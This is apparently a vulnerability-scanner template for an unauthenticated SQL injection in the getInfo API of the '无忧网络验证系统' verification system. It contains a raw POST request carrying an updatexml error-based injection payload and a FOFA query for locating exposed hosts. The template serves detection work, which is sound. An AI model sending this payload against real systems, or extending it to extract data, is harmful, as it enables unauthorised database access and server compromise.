http:
    - matchers:
        - part: body
          type: word
          words:
            - ~4297f44b13955235245b2497399d7a9
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          POST /index.php/api/Software/getInfo HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Accept-Encoding: gzip, deflate
          Accept-Language: zh-CN,zh;q=0.9
          Connection: close
          Content-Type: application/x-www-form-urlencoded

          data=1&id=1 and updatexml(1,concat(0x7e,md5(123123),0x7e),1)
id: wuyou-getInfo-sql
info:
    author: Superhero
    description: |-
        fofa: body="zhuya/js/base.js"
        无忧网络验证系统 /index.php/api/Software/getInfo 接口处存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
    name: 无忧网络验证系统 getInfo 注入漏洞
    reference:
        - https://mp.weixin.qq.com/s/NRu5f8fPlpMpVxfliiOSIw
    severity: high
    tags: []
